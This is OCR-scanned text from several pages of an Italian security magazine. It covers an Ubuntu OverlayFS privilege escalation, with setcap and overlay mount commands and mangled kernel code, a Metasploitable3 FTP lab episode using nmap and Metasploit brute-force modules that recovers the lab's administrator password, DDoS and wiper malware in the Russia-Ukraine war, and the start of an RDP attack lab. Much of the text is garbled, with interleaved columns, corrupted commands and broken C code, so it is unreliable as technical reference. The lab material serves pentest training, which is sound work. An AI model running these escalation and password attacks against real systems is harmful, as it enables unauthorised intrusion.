tra le dipendenze. Un container. 
è autonomo: contiene tutte le 
librerie necessarie per il 
funzionamento del programma. 
Se ce ne sono di più sullo stesso 
sistema, ciascuno di essi contiene 
tutte le librerie necessarie a se 
stesso. Naturalmente, questo 
comporta un importante 
consumo di spazio: molte librerie 
e molti eseguibili saranno sempre 


gli stessi tra tutti i vari container, 


ed è uno spreco occupare il 

doppio, il triplo o anche più dello 
spazio. Ed è per risolvere questo 
problema che esiste OverlayFS. 


MILLEFOGLIE 


OverlayFS è un meccanismo di 
memorizzazione dei file pensato 
per l'union mounting: si tratta di 
unire virtualmente più cartelle, 


facendole apparire come una 
sola. Il vantaggio è che si possono 


creare più cartelle con versioni 
differenti dello stesso software, 
da montare volta per volta a 
seconda della versione necessaria 
in un filesystem completo. 
Immaginiamo di avere bisogno di 
MySql 5 in un container e MySql 
8 in un altro container, ma per il 
resto dello stesso sistema di 
base. Il grosso del sistema può 
risiedere in una cartella, poi basta 
averne una per MySql 5 e una per 
MySql 8. In un container verrà 
montata la cartella della versione 
5 sopra il sistema base, e 
viceversa nell'altro. In questo 
modo si risparmia lo spazio che 
verrebbe sprecato mantenendo 
sul disco due volte i file del 
sistema base. Naturalmente, è un 
po' più complesso di così, si 
possono di fatto avere più 
versioni degli stessi file con una 
sorta di logica incrementale: 
quando si fanno modifiche a un 
container vengono memorizzati 
solo i file cambiati rispetto 
all'immagine docker di partenza, 
sempre per risparmiare spazio. 
La domanda che si ci potrebbe 
porre è: cosa succede ai permessi 
di file e cartelle, capabilities 
incluse, una volta che vengono 
montati dentro altre cartelle? Si 
può immaginare che vengano 
ereditate, ma è chiaro che si tratti 


ic 


di una situazione complessa, con 
tanti container che montano gli 
stessi file in modo diverso. Il 
problema nasce dal fatto che un 
malintenzionato potrebbe 
abusare di OverlayFS per fare in 
modo che il kernel copi dei file 
eseguibili con capabilities da 
amministratore da un punto di 
mount realizzato appositamente 
a delle cartelle sul filesystem 
principale. Facendo la copia, un 
sistema GNU/Linux non 
patchato manterrebbe la 
capability sul file, offrendo 
quindi al malintenzionato un file 
con capability da amministratore 
sul filesystem principale. 
Siccome OverlayFS può essere 
usato tramite FUSE anche da 
utenti semplici, senza alcun 
privilegio, questo significa che il 
malintenzionato deve solo 
crearsi un filesystem (lower, 
nell'esempio) su un proprio 
sistema e inserire un eseguibile 
con capability da 
amministrazione: 


setcap cap_sys_admin +eip lower/ 
suid 


Poi deve solo copiare quel 
filesystem sul sistema da 
attaccare e montarlo (nella 
cartella upper): 


mount -t overlay overlay -0 rw, 


lowerdir=lower,upperdir 


=upper,workdir=workdir mount 


A quel punto si può accedere al 


file eseguibile dal sistema vittima: 


touch mount/suid 


getcap lower/suid 


E si scopre che le capabilities 
sono rimaste intatte: 


lower/suid = cap_dac_override, 


cap_sys_admin+eip 


VULNERABILITÀ 

Nessuna delle modifiche da parte 
degli sviluppatori di Ubuntu ha 
introdotto vulnerabilità di per sé, 
ma nel 2020 era stata scoperta 
proprio una vulnerabilità in 


252 enum ovl xattr ox, void *value, 
size t size) 


261 |{ 


2 struct inode *inode = dentry->d_inode; 


int err; 

inode lock(inode); 

inode unlock(inode); 
pr_debug("setxattr(%pd2, \"%s\", 


return err; 


} 


size t size) 


{ 
} 


{ 
int err; 


inode lock(inode); 


\"&*PpE\", si\n" 
dentry, name, min((int)size, 48), value, size, Mata, err); 


struct inode *inode = dentry->d inode; 


return ovl do getxattr(path, ovl xattr(ofs, ox), value, size); 


static inline int ovl do setxattr(struct ovl fs *ofs, struct dentry *dentry, 
const char *name, const void *value, 
size t size, int flags) 


err = __vfs setxattr noperm(ovl upper mnt userns(ofs), dentry, name, value, size, flags); 


*zu, %d) = 


static inline int ovl setxattr(struct ovl fs *ofs, struct dentry *dentry, 
enum ovl xattr ox, const void *value, 


return ovl do setxattr(ofs, dentry, ovl xattr(ofs, ox), value, size, 0); 


static inline int ovl do removexattr(struct ovl fs *ofs, struct dentry *dentry, 
const char *name) 


arr = ufce remavevattr nanerminu] unner mnt ncarnelnfe) doentru name). 


OverlayFS che permetteva 
l'impostazione di attributi speciali ai 
file. Il fix è stato applicato alla linea 
originale di OverlayFS, ma non alla 
versione modificata da Ubuntu. 
Nello specifico, quando si tratta di 
gestire i permessi di un file la 
versione originale chiama una 
funzione di servizio che è stata 
realizzata appositamente per 
assicurarsi che non vengano dati 
più permessi a file che non 
dovrebbero averli. Invece, la 
versione di Ubuntu utilizza 
direttamente la chiamata di 
sistema _vfs_setxattr_noperm. Il 
problema è proprio che il flusso di 
Ubuntu non prevede dei controlli, 
che invece nel Linux “originale” 
sono stati inseriti, per evitare di 
trasferire le capabilities da un 
filesystem all'altro. 

Un dettaglio che è importante 
ricordare è che questa vulnerabilità 
ha un impatto su OverlayFS in sé, 
ma non su docker o più in generale 
sui container. Un sistema che 
utilizza docker non è di per se 
stesso vulnerabile, lo è solo per il 
fatto che ha certamente lo stack di 
overlayfs e quindi chi accede al 
sistema host potrebbe montare 
filesystem OverlayFS. Ma chi ha 
accesso solo a un container non 
può comunque uscire e 
danneggiare il sistema host. 


LA SOLUZIONE 

Le patch per l'implementazione di 
Ubuntu sono state rilasciate a un 
mese dalla scoperta delle 
vulnerabilità, e sono disponibili per 
le release da Ubuntu 20.04 al più 
recente 23.10. Purtroppo è 
vulnerabile anche Ubuntu Bionic 
(18.04) ma, non essendo più 
supportata, per questa non è 
disponibile alcuna patch. 
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are 
Ecco un'altra puntata del corso su come MERE 
le competenze da pentester: IN questo num 
utilizzare ilnoto File Transfer Protocol 


iremo Come 


gg ome abbiamo modo di SERVIZIO FTP (FTP), in esecuzione sulla porta 

| vedere, Metasploitable3 Completata questa operazione, 21 di Metasploitable3. Si tratta di 
\ dispone di una corposa possiamo dedicarci all'analisi del un protocollo “generalista”, 

8 lista di servizi [figura #1], servizio oggetto di questa comunemente erogato tanto da 


che un buon pentester non può puntata: il File Transfer Protocol sistemi di derivazione Unix che 
certo evitare di verificare: anche 


perché, in linea con la propria re ii to dei nino 
” M H Ud pi . 
missione” - che è quella di 22/tcp open ssh 49202/tcp open unknown 
80/tcp open http 49223/tcp open unknown 
fornire un ambiente ad hoc 135/tcp open msrpc 49224/tcp open unknown 
i i Ù 139/tcp open netbios-ssn 137/udp open netbios-ns 
“vulnerabile by design”, per 445/tcp open microsoft-ds 
SA Sri 1617/tcp open nimrod-agent 
consentirci di utilizzare con 3306/tcp open mysql 
B a A 3389/tcp open ms-wbt-server 
successo i tool di settore (primo ea e 
i ; ) cp open appserv-http 
fra tutti Metasploit, da cui non a 5985/tcp open wsman 
Ù 7676/tcp open imqbrokerd 
Caso prende il nome) - la VM seni open intu-ec-svcdisc 
È " 8027/tcp open papachi-p2p-srv 
risente di numerose cià open http-proxy 
RR ona 8181/tcp open intermapper 
vulnerabilità, sfruttabili per an 
o Do 8484/tcp open unknown 
accedere - mediante tecniche e 8585/tcp open unknown 
CO È 8686/tcp open sun-as-jmxrmi 
strumenti diversi - alle 9200/tcp open wap-wsp 
"i S ene 9300/tcp open vrace 
bandiere" (in inglese flag) 47001/tcp open winrm 
- 5 k 
nascoste nel filesystem sotto Pics liizioi pae 
5 a k 
forma di vere e proprie carte da a a give arnie 
gioco. Ed è proprio la prima Pi pria 


carta da gioco il trofeo a cui 
puntiamo: ma prima di poterlo 
conquistare, dobbiamo accedere 
all'ambiente virtuale. 


Az 


ftp 21 metasploitable3 


METASPLOITABLE3 


Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-29 05:27 CEST 


mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. 


Try using — 


system-dns or specify valid servers with —dns-servers 
Nmap scan report for metasploitable3 (169.254.161.202) 


Host is up (0.00084s latency). 


PORT STATE SERVICE 

21/tcp open ftp 

| ftp-syst: 

|_  SYST: Windows_NT 

| ftp-brute: 

I Accounts: No valid accounts found 


|_ Statistics: Performed 50009 guesses in 55 seconds, average tps: 881.3 


Nmap done: 1 IP address (1 host up) scanned in 55.10 seconds 


da quelli del mondo Microsoft. In 
questo ultimo caso, il servizio è 
fornito avvalendosi del server 
web incluso nativamente nei 
sistemi Windows Server, ovvero 
IIS (Internet Information Service). 
Proviamo quindi a catturare il 
banner del server, connettendoci 
alla porta 21 di Metasploitable3 
con il comando 

# nc 169. 254.161.202 21 
L'output ottenuto coincide con 
quanto è lecito attendersi in un 
ambiente Windows: il servizio 
FTP è erogato mediante IIS. 


ANALISI DEL SERVIZIO 
Andiamo allora a esaminare più 
in profondità il servizio, 
affidandoci a nmap e ai suoi 
script. Con il comando: 

# nmap -script ftp* -p 21 


metasploitable3 

chiediamo al tool di effettuare 
una scansione sulla porta 21 del 
nostro target e di eseguirvi tutti 
gli script il cui nome inizi con il 
prefisso “ftp”. Il risultato 

[figura #2] non è entusiasmante: 
oltre a confermare la già nota 
presenza del servizio FTP e il 
fatto che sia erogato da un 
sistema Windows, nmap si limita 
a effettuare qualche tentativo di 
login utilizzando tecniche di 
bruteforce, che tuttavia non 
comportano alcun successo (a 
fronte di circa 50.000 tentativi 
d'accesso). Né va meglio 


cercando qualche vulnerabilità 
del modulo che garantisce 
l'erogazione del servizio FTP in 
seno a IIS; il comando: 


# searchsploit ftp | grep -i 
microsoft 


restituisce un certo numero di 
risultati, nessuno dei quali risulta 
tuttavia applicabile allo specifico 
ambiente con cui abbiamo a che 
fare (IIS 7.5, presente di default 
sui sistemi operativi Windows 
Server 2008 R2). 


ACCESSO ANONIMO 

Non bisogna disperare: abbiamo 
ancora più di qualche freccia al 
nostro arco. Di cosa si tratta? 
Semplice: se opportunamente 
configurati, i server FTP sono in 
grado di garantire l'accesso a 
utenti anonimi, ovvero privi di 
credenziali di autenticazione (0, 
meglio, che utilizzino il nome 
utente anonymous e una 
password arbitraria, 
generalmente coincidente con un 
indirizzo di posta elettronica 
come per esempio anonymous@ 
labpentest.pt). Si tratta di una 
funzionalità che, per quanto 
“comoda”, negli anni ha 
contribuito a veicolare l'idea che 
FTP sia un protocollo “poco 
sicuro”. Non è difficile intuirne il 
motivo, basta immaginare cosa 
possa accadere a un server in cui 
l'accesso anonimo sia abilitato in 
lettura e in scrittura: prima che 


tale tipologia di accesso divenisse 
- come al giorno d'oggi - una 
feature disabilitata di default, 
situazioni come quella appena 
descritta erano piuttosto comuni, 
e gli owner di turno si trovavano 
- loro malgrado - a essere 
responsabili di veri e propri 
repository di file privi di qualsiasi 
controllo (se non decisamente 
illegali!). 

Visto che Metasploitable3 
dispone di un server FTP, vale la 
pena provare a effettuare un 
accesso anonimo: avviamo il 
client ftp con il comando: 

# ftp metasploitable3 

quindi inseriamo come username 
la stringa anonymous e come 
password anonymous@ 
labpentest.pt. Anche questo 
tentativo non va a buon fine: il 
server ci restituisce un esplicito 
errore con codice 530, “User 
cannot log in”. 


METASPLOIT 

Sino a questo punto ci siamo 
affidati a diversi tool per 
interagire con il server FTP, 
nell'ottica di diversificare le 
nostre conoscenze ed essere in 
grado di raggiungere gli obiettivi 
del pentest adoperando tutti gli 
strumenti messi a disposizione 
dalla distribuzione Kali. In realtà 
le verifiche effettuate avrebbero 
potute essere svolte tutte con un 
singolo tool omnicomprensivo: il 
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Lai 


msf6 > use auxiliary/scanner/ftp/ftp_version 
msf6 auxiliary( ) > info 


Name: FTP Version Scanner 

Module: auxiliary/scanner/ftp/ftp_version 

License: Metasploit Framework License (BSD) 
Rank: Normal 


Provided by: 
hdm <x@hdm.io> 


Check supported: 
No 
Basic options: 


Name Current Setting 


Required Description 


FTPPASS mozillaQexample.com 
FTPUSER anonymous 


The password for the specified username 
The username to authenticate as 


RHOSTS The target host(s), see https://github.com/rapid7/metasploit-framework/ 
wiki/Using-Metasploit 


RPORT 21 
THREADS 1 


Description: 
Detect FTP Version. 


msf6 auxiliary( 
RHOSTS = metasploitable3 


pluricitato Metasploit. Dopo 
averlo avviato con il comando # 
msfconsole ed esserci collegati al 
DB interno - già alimentato nelle 
precedenti puntate - con i 
comandi: 


msf6> db_connect 


msf6> workspace 
metasploitable3 


procediamo a verificare quanto 
appurato in merito alla versione 
del servizio FTP. 


MODULI D'INTERESSE 

A tale scopo, utilizziamo il 
modulo auxiliary/scanner/ftp/ftp_ 
version [figura #3], che richiede 
unicamente l'impostazione delle 
variabili RHOSTS (ovvero 
l'indirizzo dell'host oggetto della 
verifica): 


msf6> use auxiliary/scanner/ 


ftp/ftp_version 


The target port (TCP) 
The number of concurrent threads (max one per host) 


) > set RHOSTS metasploitable3 


specifico tool utilizzato per la sua 
estrazione. In ogni caso, 
Metasploit non si ferma qui: ci 
mette a disposizione anche un 
modulo apposito per verificare la 
presenza di un eventuale 
anonymous login: si tratta del 
modulo auxiliary/scanner/ftp/ 
anonymous, di cui possiamo 
conoscere i dettagli con i 
comandi: 


msf6> use auxiliary/scanner/ 
ftp/anonymous 


msf6> info 


Anche in questo caso, l'unica 
variabile da impostare 
obbligatoriamente è 
rappresentata da RHOSTS, quindi 
il modulo può essere avviato con 
i comandi: 


msf6> set RHOSTS 
metasploitable3 


conduzione di attacchi alle 
password, sufficientemente 
versatile per poter essere 
impiegato tanto per attacchi 
bruteforce che per quelli basati 
su dizionario o di tipo password 
spray. In questo specifico caso, 
proveremo di nuovo a 
cimentarci in un attacco del 
dizionario, opportunamente 
esteso considerando per ciascun 
utente anche le password vuote 
e quelle coincidenti con il nome 
utente stesso. A tal fine: 

e avviamo il modulo auxiliary/ 
scanner/ftp/ftp_login 

msf6> use auxiliary/scanner/ 
ftp/ftp_login 

* visualizziamone le informazioni 
di base per conoscere il nome 
delle variabili d'interesse 

msf6> info 


msf6> run 


msf6> set RHOSTS 
metasploitable3 


prima di essere avviato, con il 
comando 


msf6> run 


Il risultato è il medesimo 
riscontrato in precedenza: ma 
d'altronde, proprio come 
affermato dall’output del 
modulo, quello restituito è il 
banner del servizio FTP, che 
rimane sempre lo stesso 
indipendentemente dallo 
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e, come per il tentativo 
precedente condotto tramite il 
client fto, anche il modulo 
conferma l'impossibilità di 
accedere al server con un login 
anonimo. 


ATTACCO 

ALLE PASSWORD 

Proviamo a ricorrere ancora una 
volta alle maniere forti, allora: 
Metasploit offre per FTP un 
modulo ad hoc per la 


* impostiamo le variabili 
obbligatorie (la solita RHOSTS) e 
quelle a noi necessarie per 
consentire al modulo di 
effettuare la verifica nelle 
modalità sopra indicate 

msf6> set RHOSTS 
metasploitable3 

msf6> set BLANK PASSWORDS true 
msf6> set USER_AS_PASS true 
msf6> set USER_FILE /usr/ 
share/wordlist/metasploit/ 


default_users_for_services_ 
unhash.txt 


msf6> set PASS_FILE /usr/ 

share/wordlist/metasploit/ 
default_pass_for_services_ 
unhash.txt 
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METASPLOITABLE3 


server accessibili all'utente 
corrente: possiamo farlo con il 
comando: 

ftp> ls — 1 


msf6> set VERBOSE false 


* infine, avviamo il modulo 


msf6> run 


LOGIN AL SERVER 

Come risultato otteniamo una 
coppia di credenziali valide per il 
login sul server FTP che 
coincidono con quelle dell'utente 
Administrator! Non ci resta che 
provarle, effettuando il login sul 
server mediante il già noto client 
ftp. Lanciamo una seconda 
console, e avviamo il client con il 
comando: 


# ftp metasploitable3 


quindi forniamo le credenziali 
appena individuate dal modulo 
ftp_login di Metasploit 
(username administrator, 
password vagrant): in assenza di 
errori di battitura, il server ci 
ricompenserà con un 
meraviglioso (dalla nostra 
prospettiva di pentester) 
messaggio “230 User logged in”. 
A questo punto possiamo 
verificare quali siano i file sul 


che restituisce un certo numero 
di risultati interessanti, 
soprattutto alla luce di quanto 
sappiamo sulla VM target e sulle 
flag in essa disseminate. 


FLAG 

| file seven_of_hearts.html e six_ 
of _diamonds.zip hanno nomi 
che riportano a carte da gioco: 
ovvero la forma peculiare che le 
flag assumono in 
Metasploitable3! In altri 
termini, quei file rappresentano 
quelli che in un ambiente reale 
sarebbero considerati dei veri e 
propri “goal” del test: 
dimostrando di avervi avuto 
accesso durante la verifica, il 
pentester è in grado di fornire 
un'indicazione immediatamente 
comprensibile - anche al 
personale meno tecnico 
dell'organizzazione target, 
come ad esempio i top 
manager - della gravità della 
vulnerabilità sfruttata e, 
conseguentemente, 


Configurazione di rete 


dell'impellenza di implementare 
il piano di rientro che sarà 
allegato al report finale. 


DOWNLOAD DEI FILE 
Prima di giungere a questo 
obiettivo, tuttavia, dobbiamo 
procedere al download dei file, 
che possiamo disporre 
ricorrendo al comando mget: 
ftp> mget * avendo cura di 
confermare (opzione di risposta 
“a”, abbreviazione di “all”) la 
volontà di procedere al 
download di tutti i file, una 
volta che il client ne richiederà 
conferma. 

Obiettivo raggiunto? Non 
esattamente: Metasploitable3 
implementa diverse tecniche 
per offuscare le flag, simulando 
in tal modo quelle misure di 
mitigazione del rischio che non 
è inconsueto implementare in 
un ambiente reale. C'è ancora 
molto da fare, se vogliamo 
visualizzare le carte che 
abbiamo appena scaricato: ma 
di questo ce ne occuperemo 
nella prossima puntata, nel 
frattempo potete iniziare a 
provarci voi. 
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Sono tra le principali 
digitali" tra Russia € 


artiamo dal DDoS. 

È l'acronimo di 

Distributed Denial Of 

Service, che in italiano 
possiamo tradurre come 
negazione di servizio, una 
tipologia di attacco 
informatico nata alla fine 
degli anni 90 (come DoS), 
molto diffusa e di estrema 
efficacia. Questo tipo di 
attacchi consiste nell'inondare 
un sistema informatico con 
un enorme numero di 


richieste, esaurendone le 


risorse e iImpedendone 
l'erogazione dei servizi. 


Attualmente, il DDoS è uno 
degli attacchi più popolari nel 
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macchina attaccata, ma la sua 
capacità di rispondere e 
garantire il servizio al quale è 
destinata. 


mondo dell'hacking 
informatico, in quanto 
garantisce un alto grado di 
anonimità (quasi totale) 


dell'attaccante ed è in grado 
di bloccare il funzionamento 
di un sito Web o di un server 
senza causarvi danni fisici; ciò 


I danni causati da un attacco 
del genere possono essere 
ingenti: ogni volta che un sito 
viene sovraccaricato e cessa 


di funzionare crea un 
disservizio e un danno 
economico direttamente 


che viene compromesso, in 
sostanza, non è il 
funzionamento della 


Durante un attacco DDoS possono 
venire inviati anche oltre 1,5 Terabyte 
di dati al secondo, in modo da bloccare 
e compromettere il funzionamento 

di qualsiasi sito Web o server 


Controller 


Zombies 


proporzionale alla durata e 
all'intensità dell'attacco. Ci 
sono diverse tipologie di 
attacchi DDoS: possono 
provenire da un singolo PC o 
da un gruppo di computer, 
spesso attori inconsapevoli, in 
modo da depistare le tracce; 
negli anni il crescente utilizzo 
di attacchi di questo tipo ha 
portato allo sviluppo di 
numerose varianti, sempre 
più efficaci e difficili da 
controllare. Per queste 
ragioni è ampiamente 
adoperato nel conflitto 
Russia-Ucraina 


DISTRIBUTED DENIAL 
OF SERVICE 

Come già accettato, 
inizialmente erano conosciuti 
come attacchi DoS, e si 
basano sull'esaurimento delle 
risorse di sistema e di tutti i 
dispositivi che fanno da 


DDOS E WIPER MALWARE 


Victim 


tramite tra client e server. La 
loro intensità si misura in 
pacchetti per secondo e il 
flusso di invio dipende in 
modo diretto dalla 
connessione internet 
utilizzata. Sono attacchi a 
protocollo volumetrico, 
orientati alla saturazione del 
servizio mediante l'invio di 
grandi quantità di dati. Un 
esempio? Il SYN FLOODING, 
considerato il pioniere degli 
attacchi DoS, che tradotto 
significa appunto 
“inondazione di pacchetti 
Syn”. Gli attacchi di tipo DDoS, 
invece, ovvero Distributed 
Denial of Service, necessitano 
di più macchine per 
effettuare un'aggressione, 
riuscendo, grazie alle 
molteplici risorse utilizzate, a 
generare enormi flussi di dati, 
e risultando estremamente 
efficace e difficile da tracciare. 
Tuttavia, è raro che 


l'attaccante possieda un 
numero di terminali tale da 
poter sferrare un attacco in 
solitaria; risulta quindi 
necessario infettare PC terzi, 
lasciando delle backdoor dalle 
quali accedere al momento 
del bisogno. | computer 
infettati, detti anche ZOMBIE, 
una volta sotto il controllo 
dell'hacker, costituiscono la 
cosiddetta Botnet che, una 
volta raggiunte le dimensioni 
necessarie all'attacco, verrà 
attivata ai danni del server 
attaccato. Le connessioni di 
ultima generazione, 
consentendo l'invio di quantità 
sempre maggiori di dati, 
stanno contribuendo al forte 
aumento di attacchi DDoS. 


ATTACCO DRDOS 
II DRDOS è una variante del 


DDosS che si caratterizza per 


Tipo di attacco DoS in cui il pirata 
invia una enorme serie di richieste 
SYN sufficienti a bloccare il 
funzionamento delle risorse del 
server. 


Tipo di attacco DoS in cui viene 
inviata una serie di pacchetti IP 


contenenti lo User Datagram 
Protocol per bloccare il server. 


Computer connesso a Internet 
compromesso dall'azione di un 
malware, che fa parte di una botnet 
e può contribuire all'attacco. 


Distributed Reflection Denial of 
Service, indica l'invio di finte 
richieste a un gran numero di Pc che 
rispondono bloccando il mittente. 


Zig 


l'invio di una grande quantità 
di dati in breve tempo; nel 
Distributed Reflected Denial 
of Service, l'attaccante invia a 
uno o più server dotati di 
banda larga delle richieste di 
accesso sostituendo il proprio 
IP con quello del bersaglio da 
attaccare. Così facendo le 
risposte vanno a confluire sul 
Pc/Server attaccato 
bombardandolo con 
un'enorme quantità di 
richieste. Basta considerare 
che, in alcuni tipi di richieste, 
ogni volta che uno dei server 
invia un pacchetto a un Pc 
senza ottenere risposta reitera 
la richiesta per tre volte. Il 
DRDosS, oltre a essere molto 
efficace, risulta difficilmente 
schermabile dall'utente in 
quanto, se si sceglie di filtrare 
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Shamoon Q 2012 


2013 


Dark Seoul 


Ordinypt/GermanWiper 
Dustman. 


ZeroCleare 


le risposte da dare ai server, si 
va a compromettere la 
funzionalità della connessione. 
Esistono poi tanti tipi di attacco 
“a negazione di servizio”. Un 
esempio è L'UDP FLOOD, che 
utilizza l'User Datagram Protocol, 
un tipo di protocollo utilizzato 
dove è più importante la velocità 
piuttosto che la qualità dei 
pacchetti. C'è poi lo SMURF, un 
attacco che può avvenire tramite 
una normale connessione via 
modem data la modesta 
quantità di pacchetti inviati. Il 
sistema si basa sulla 
comunicazione con una rete 
esterna, mal configurata, che 
funge da moltiplicatore di 
pacchetti. Una volta moltiplicati 
questi pacchetti vengono inviati 
al bersaglio prestabilito 
utilizzando connessioni ad alta 


velocità. Il requisito principale di 
questa tipologia di attacco è la 
sopracitata “rete mal 
configurata” che risulta 
facilmente manipolabile. Si può 
citare anche l'attacco Slowloris, il 
cui obiettivo principale è di 
stabilire e mantenere delle 
connessioni attive con il sito Web 
attaccato. In sostanza vengono 
inviate numerose richieste di 
connessione parziali al web 
server che, pur non andando a 
buon fine, generano un 
intasamento non consentendo al 
server attaccato di ricevere 
connessioni da altri utenti e 
rallentandolo vistosamente. 


WIPER MALWARE 
Anche noto come malware 
cancellatore, è un tipo di 


software dannoso 


Wiper Malware Timeline 


2014 


Olympic Destroyer 2017 


NotPetya 


2015 


Shamoon 2016 
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IsaacWiper 
CaddyWiper 
DoupleZero 


AcidRain 


progettato per distruggere o 
danneggiare 
irrimediabilmente i dati 
presenti su un sistema 
informatico. A differenza di 
altri malware, il suo 
obiettivo principale non è il 
furto di informazioni o il 
controllo remoto, ma la 
distruzione totale dei dati. 


COME FUNZIONA? 
Solitamente l'attacco 
avviene in tre fasi: 
Infiltrazione: il malware 
può essere distribuito 
attraverso diverse tecniche, 
tra cui phishing, exploit di 
vulnerabilità o attraverso la 
compromissione di sistemi 
legittimi; Esecuzione: una 
volta infiltrato, malware si 
attiva e inizia a distruggere i 
dati presenti sul sistema di 
destinazione. 

Questo può includere la 
cancellazione di file, la 
sovrascrittura dei dati o la 
corruzione delle 
informazioni crittografiche; 
Copertura delle tracce: 
l'obiettivo principale è 
nascondere la sua presenza 
e le sue attività distruttive. 
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DDOS E WIPER MALWARE 


Di solito, il malware cancella 
i log di sistema o installa 
componenti aggiuntivi per 
rendere più difficile il 
rilevamento e la rimozione 


[figura #2]. 
NEL CONFLITTO 


Durante gli scontri tra 
Russia e Ucraina sono 
emerse varie evidenze 
dell'uso di attacchi 
tramite Wiper Malware da 
parte di ambedue le parti 
coinvolte. Gli attacchi sono 
stati utilizzati come arma 
cibernetica per infliggere 
danni significativi alle 
infrastrutture e alle risorse 
critiche. Nello specifico, 
sono stati adoperati per 
attaccare e danneggiare i 
sistemi energetici, le reti di 
distribuzione dell'acqua e 
altre infrastrutture vitali, 
mirando a destabilizzare il 
nemico e creare caos nella 
società. In altri casi, sono 
stati utilizzati per alterare e 
distruggere le informazioni 
all'interno dei sistemi di 
comunicazione e dei media, 
al fine di diffondere 
disinformazione e 


manipolare la percezione 
del nemico, oppure per 
colpire i sistemi informatici 
delle forze armate, cercando 
di danneggiare o 
compromettere le loro 
capacità operative. 

Un esempio su tutti è l’uso 
del malware WhisperGate, 
individuato dai ricercatori 
del Microsoft Threat 
Intelligence Center (MSTIC). 
Si tratta di un agente 
infettante diffuso in due 
momenti diversi. Nella 
prima fase ha tentato di 
distruggere il Master Boot 
Record e di mettere fuori 
uso eventuali opzioni di 
ripristino. Nella seconda 
fase, invece, un downloader 
ha estratto il codice 
necessario per avviare una 
terza fase, ovvero 
l'esecuzione di un comando 
PowerShell che ha mandato 
in sospensione gli endpoint 
per 20 secondi (giusto il 
tempo di attivare un 
offuscatore e una libreria 
che ha scaricato il payload 
di attacco). Poi, l'ultima fase 
è stata la distruzione dei file 
e la loro sovrascrittura. 


L'impatto e le conseguenze della diffusione 
del Wiper Malware durante la guerra 
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Quattro possib ‘ 
che è possibile realizz 


di casa Microsoft 


ili Eeonan con altret i 
are sfruttando iL Re 


tante tipologie di attacco 
mote Desktop Protocol 


| Remote Desktop Protocol ha 
sempre rappresentato un 
elemento significativo 
dell'accesso remoto, facilitando 
le operazioni e la manutenzione dei 
sistemi Windows a distanza. Ma si 
sa, da “un grande potere derivano 
grandi responsabilità”! 
Ma prima di scoprirle e addentrarci 
nelle tecniche di attacco tramite 
protocollo RDP, diamo uno sguardo 
ai dettagli tecnici e alla macchine 
usate in questo approfondimento. 


| test che abbiamo fatto per la 
stesura di questo 
approfondimento sono stati 
realizzati con un laboratorio così 
composto: Macchina Attaccante, 
Kali Linux - IP: 192.168.178.129; 
Prima Macchina Target, Windows 
11su Oracle VM - IP: 
192.168.178.131; Seconda 
Macchina Target: Windows Server 
2008 R2 x64 su Oracle VM—IP: 
192.168.178.133; Terza Macchina 
Target: Windows 7 x64- Su 


WMware 14: IP: 192.168.178.135. 
Per abilitare l'accesso RDP sulla 
macchina target abbiamo seguito 
il seguente metodo: premere 
Windows + R per aprire la finestra 
di dialogo Esegui; digitare “sysdm. 
cpl” e dare Invio; si apre la scheda 
“System Properties”; scegliere la 
categoria “Remote”; alla voce 
“Remote Desktop” cliccare su 
Allow remote connections to 
this computer; infine, premere 


Apply. 


Detta 


Architettura: RDP è basato sul modello client-server. 
Questo ospita la sessione e il client si connette a 
quella sessione. Questo permette agli utenti di 
controllare il server come se fossero fisicamente 
presenti davanti al computer. 

Codifica: RDP utilizza tecniche di compressione dei 
dati per ridurre la larghezza di banda necessaria per 
trasmettere informazioni tra il client e il server. 
Inoltre, adatta la qualità della trasmissione in base 
alle condizioni della rete. 

Sicurezza: una delle preoccupazioni principali 
riguardo l'accesso remoto è la sicurezza. RDP ha 
integrato funzionalità di sicurezza come la crittografia, 
autenticazione basata su certificati e Network Level 
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li tecnici del protocollo RDP 


Authentication (NLA), per garantire che solo gli utenti 
autorizzati possano stabilire una connessione. 

Porta di default: RDP utilizza la porta TCP 3389. 
Funzionalità Avanzate: con gli anni, RDP ha 
introdotto funzionalità come il trasferimento di file, la 
stampa remota, la condivisione di appunti e l'audio 
bidirezionale. Questo ha reso possibile per gli utenti 
non solo controllare un computer in remoto, ma 
anche utilizzare quasi tutte le funzionalità come se 
fossero fisicamente presenti. 

Compatibilità: anche se RDP è un protocollo 
sviluppato da Microsoft, esistono client RDP per quasi 
tutte le piattaforme, inclusi macOS, Linux e dispositivi 
mobili. 


be nmap per effettuare una 
scansione sull'host target, puntando 
alla porta di default del servizio: 


nmap -vvv -n -Pn -ST 
192.168.178.131 -p 3389 

1. nmap: avvia l'utility nmap. 

2. -vvv: aumenta il livello di verbosità 
dell'output. Più “v*, più dettagliato sarà 
l'output. 

3. -n: non risolve gli indirizzi IP in nomi 
DNS. 

4. -Pn: Tratta tutti gli host come se fos- 
sero online e salta la fase di discovery 
(ping). 

5. -sT: tenta di stabilire una connessione 
TCP, completando l'hand-shake con ogni 
porta specificata. È più lento e rilevabile 
rispetto ad altre tecniche, ma non richie- 
de privilegi di root. 

6. 192.168.178.131: indirizzo IP dell'host 
di destinazione da analizzare. 

7. -p 3389: esegue la scansione solo sul- 
la porta specificata. In questo caso è la 
porta 3389, comunemente utilizzata per 
il protocollo Remote Desktop Protocol 
(RDP) di Microsoft [figura #1]. Dopo 
esserci assicurati che il servizio è in ascol- 
to sulla porta di default, effettuiamo una 
scansione più “invasiva” con -A: 
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Come primo scenario, ipotizziamo che il nostro Amministratore di rete abbia 
configurato delle regole di Network Address Translation (NAT) sul firewall aziendale, 
per consentire l'accesso RDP da Internet su un server di produzione. 


TAZZA, 
Nmap scan report for 192.168.178.131 
Host is up, received user-set (0.0062s latency). 

CEST for 0s 


PORT STATE SERVICE REASON 
3389/tcp open ms-wbt-server syn-ack 


Read data files from: /usr/bin/../share/nmap 


Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds 


* Riconoscimento del Sistema Opera- 
tivo (-O): nmap cerca di determinare il 
sistema operativo dell'host target. Ciò 
viene fatto analizzando le risposte ai 
pacchetti inviati durante la scansione. 

e Esecuzione di script (NSE: Nmap 
Scripting Engine): nmap ha un motore di 
scripting estremamente potente chiama- 
to NSE. Con l'opzione -A, nmap eseguirà 
una serie di script predefiniti da una 
categoria chiamata “default”. 

e Traceroute (--traceroute): questa 
opzione fa inmodo che nmap determini 
e mostri il percorso attraverso la rete che 
i pacchetti seguono per raggiungere l'host. 
Analizzando l'output del comando pos- 
siamo osservare che il nome della mac- 
